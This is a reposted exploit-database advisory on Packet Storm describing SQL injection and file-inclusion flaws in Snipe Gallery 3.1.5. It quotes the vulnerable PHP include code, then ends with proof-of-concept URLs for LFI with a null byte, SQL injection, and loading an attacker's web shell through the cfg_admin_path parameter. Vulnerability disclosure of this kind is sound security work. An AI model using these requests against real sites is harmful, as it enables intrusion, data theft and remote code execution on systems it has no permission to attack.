Snipe Gallery version 3.1.5 suffers from remote SQL injection and local file inclusion vulnerabilities.
23e9c9e5fce80e64c30c7cde3540398ee2180151fd050c3176a39fa75db9ffab##################################################################
snipegallery-3.1.5 Multiple Vulnerability
##################################################################
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title: snipe gallery Multiple Vulnerability
[+]Version: 3.1.5 (other or lower version may be also affected)
[+]Home Page: https://www.snipegallery.com/
[+]Download: https://sourceforge.net/project/showfiles.php?group_id=116929
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s To: JosS , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db team & all friends
########################################################
Description:
Snipe Gallery is a PHP/mySQL image management system featuring (but never limited to!): automatic watermarking, dynamic thumbnailing, online cropping/custom thumbnail tool, image dropshadows, custom "picture frames" and more!
########################################################
-=[ Vuln C0de ]=-
**********************
[-] Path/index.php
**********************
*/
$GALLERY_SECTION = "gallery";
$PAGE_TITLE = "Galleries";
include ("inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ("layout/header.php");
**********************
[-] path/search.php
**********************
/**
*
* {@source }
*/
$GALLERY_SECTION = "search";
$PAGE_TITLE = "Search";
include ("inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ("layout/header.php");
if ((empty($_REQUEST['page'])) || ($_REQUEST['page'] <= 0)){
$page = 1;
} else {
$page = $_REQUEST['page'];
}
**********************
[-] path/image.php
**********************
/**
*
* {@source }
*/
$GALLERY_SECTION = "image";
$PAGE_TITLE = "Images";
include ("inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ($cfg_admin_path."/lib/dropdown.functions.php");
/**
**********************
[-] path/view.php
**********************
$GALLERY_SECTION = "image";
$PAGE_TITLE = "Images";
include ("inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ($cfg_admin_path."/lib/dropdown.functions.php");
**********************
[-] path/inc/config.php
**********************
include ($cfg_admin_path."/lang/".$cfg_use_langfile.".php");
**********************
[-] path/admin/index.php
**********************
$GALLERY_SECTION = "gallery";
include ("../inc/config.php");
include ($cfg_admin_path."/lib/admin.functions.php");
**********************
[-] path/admin/frames/index.php & path/admin/frame.php
**********************
$GALLERY_SECTION = "frames";
$PAGE_TITLE = "Photo Frames";
include ("../../inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ("../layout/admin.header.php");
**********************
[-] path/admin/gallery/index.php & path/gallery/gallery.php
**********************
$GALLERY_SECTION = "gallery";
$PAGE_TITLE = "Galleries";
include ("../../inc/config.php");
include ($cfg_admin_path."/lib/connect.php");
include ($cfg_admin_path."/lib/admin.functions.php");
include ("../layout/admin.header.php");
**********************
[-] path/admin/frames/index.php & path/admin/frame.php
**********************
**********************
[-] path/admin/frames/index.php & path/admin/frame.php
**********************
-=[ Proof Of Concept ]=-
https://127.0.0.1/view.php?gallery_id=x&page= [lfi]%00x
https://127.0.0.1/view.php?page=x&cfg_admin_path= [lfi]%00x
https://127.0.0.1/image.php?gallery_id= [SQL]
https://127.0.0.1/image.php?gallery_id=x&cfg_admin_path= [inj3ct0r sh3ll]
https://127.0.0.1/index.php?cfg_admin_path= [LFI]%00
etc , etc , etc.
=========================| -=[ E0F ]=- |=================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed